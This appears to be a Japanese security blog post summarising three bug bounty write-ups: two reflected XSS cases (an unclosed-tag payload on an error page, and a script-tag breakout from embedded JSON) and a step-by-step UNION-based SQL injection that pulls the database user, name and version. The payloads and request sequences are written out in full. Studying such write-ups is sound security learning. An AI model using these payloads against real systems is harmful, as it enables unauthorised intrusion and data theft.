Hello there, ('ω')ノ

エラーページに奇妙な（不可能な）可能性のあるXSSを。

脆弱性：

　反射型XSS

記事：

　https://komradz86.medium.com/weird-im-possible-xss-on-error-page-a0b943ead41

今回のターゲットを、test.comとすると。

このWebサイトでは、エラーページが無効になっていて。

バックグラウンドを使用してWebサイト自体に統合されていて。

悪意のあるものを追加しようとしても、別のページにリダイレクトされて。

ただ、test.com/testで、エラー（Reflection Exception）を取得することができて。

このエラーに関する詳細情報を検索し始めたところ。

一部のリサーチャーが、htmlを挿入できたことがわかって。

このエラーをどのように見つけたかというと。

元のページ（test.com/test）にディレクトリに拡張子を追加したわけで。

test.com/test.php、またはtest.com/test.aspxをテストしたところ。

エラーページが表示されたので、エラーページのエラーメッセージを。

自分のエラーメッセージに操作できることがわかって。

次に何か他のものをチェックし始めると。

しばらくして、テスト中に同じエラーページに出くわすことに。

HTMLインジェクションをテストすると。

エラーメッセージが太字や下線付きなどで、HTMLをインジェクションできて。

次にXSSのテストを開始して、本の中で実行できるすべてのことを行って。

多くのペイロードをテストすると。

ページが特定のタグにのみ応答して、他のタグが無視されているのが奇妙で。

HTMLタグを再テストしたところ、同じことが起こって。

タグが受け入れられない場合は、ホームページにリダイレクトされるようで。

他のすべてのタグの代わりに<img src=タグを使用してXSSペイロードを挿入すると。

画像がインポートされていることを示す小さなアイコンが、ページに反映されたので。

これで、XSSを取得できたと思って。

さらに試したすべてのペイロードは、ホームページにリダイレクトされたので。

はじめのページに戻ったので怪しく思って。

さらにペイロードを試していると、下記（例）がWeb管理者によって。

使用されたホームページ、またはエラーページにリダイレクトされてたので。 

　<script>alert(1)</script>

Webサイトで悪意のあるコードを検出するために管理者が知らなかったのは。

タグを閉じなくても悪意のあるペイロードを挿入できたという、ある種の設定ミスで。

　例：<script>alert(1)

そして、各ペイロードを試した後に、初めに書いたようにtest.aspxを削除して。

ペイロードをディレクトリとして追加して、ペイロードを.aspxで終了することに。

最終的なペイロードは下記のとおりで。

　%3Cimg%20src=%22'%22id=’%3Cimg%20src=%22%22%3E’onerror=alert(1).aspx

　⇧

　<img src="'"id='<img src="">'onerror=alert(1).aspx

ちょっとわかりずらいかも。

Best regards, (^^ゞ

Hello there, ('ω')ノ

REDACTEDプログラムに反映されたクロスサイトスクリプティングを。

脆弱性：

　反射型XSS

記事：

　https://infosecwriteups.com/reflected-cross-site-scripting-on-private-program-bounty-750-34cc67a931f1

このサイトは、画面からの入力を受け取っていないようだったので。

これは調査する価値があると思って。

URLの末尾に追加した<script>タグは、ページ上の一部の文字を明らかにして。

　"}}]}]

ソースコードを調べたところ、URLの末尾に追加したすべての値は。

JSONで生成された変数に割り当てられていたので。

JSONデータが、<script>タグの間に配置されていることを確認できて。

この時点で、</script>タグを使用して閉じてからXSSペイロードを入力するだけで。

　target.com/affected/url</script><img src=xss onerror=alert(1)>

ユーザからの入力を受け取っていないように見える場合でも。

ソースコードのURLの末尾に追加する値を必ず確認するように。

Best regards, ('ω')ノ

Hello there, ('ω')ノ

SQLインジェクションのバグで$$$を簡単に入手した方法を。

脆弱性：

　SQLインジェクション

記事：

　https://rafipiun.medium.com/how-i-got-easy-for-sql-injection-bug-7ff622236e4c

ツール：

　Burp Suite

今回のターゲットをRedacted.comと呼ぶことに。

コンセプトの証明 ：

１．新しいアカウントにサインアップして。

２．指示に従って進むと、下記のページを手に入れて。

３．下記のURLを取得できて。

　　https://redacted.com/user/activation/xxx/1325589

　1325589は、自分のユーザIDで。

　ウェブサイトにSQLインジェクションがあるかどうかを試すために。

　一重引用符（ ‘）を上記のURLに追加したものの、見当たらず。

４．しかし、ページが再び表示される場合は。

　ページに「アクティベーションリンクを再送信」ボタンがあるので。

　インターセプトをオンにしてボタンをクリックして。

５．下記のようなリクエストとレスポンスを受け取って。

    応答は、自分にリダイレクトされていて。

　    Location: https://redacted.com/user/resendactivation/xxx/1325589/?smsg=green

６．なので、一重引用符を追加してリクエストを変更することに。

　　GET /resend/activation/1325589'

    すると、自分にリダイレクトされて。

　　Location: https://redacted.com/signup_page/xxx

７．次にリクエストに『--+-』を追加してみると。

　　GET /resend/activation/1325589'--+-

　応答は先ほどのデフォルトの要求に変換されるので、SQL Inejctionを確認できて。

　　Location: https://redacted.com/user/resendactivation/xxx/1325589/?smsg=green

８．次に「order by 5」を追加してみると。

    応答がFalse状態に変わるので、列は５個なくて。

　　GET /resend/activation/1325589'order+by+5--+-

９．「order by 4」を試しても失敗して。

１０．「order by 3」でリダイレクトして成功したので、列は３個で。

１１．なので、下記の「union select」を試すことに。

　　GET /resend/activation/1325589'union+select+1,2,3--+-

    リダイレクトされた応答を確認すると『３』を得ることができて。

　    Location: https://www.redacted.com/user/resendactivation/xxx/3/?smsg=green

１２．今度は、3番目にSQLクエリを挿入してみるとユーザを取得できて。

　　GET /resend/activation/1325589'union+select+1,2,user()--+-

　リダイレクトされた応答は下記のとおりで。

　　Location: https://www.redacted.com/user/resendactivation/xxx/XXXdmin@XXX/?smsg=green

１３．最後にデータベース名とバージョンを取得してみることに。

　　GET /resend/activation/1325589'union+select+1,2,concat(user(),0x3a,database(),0x3a,version())--+-

Best regards, (^^ゞ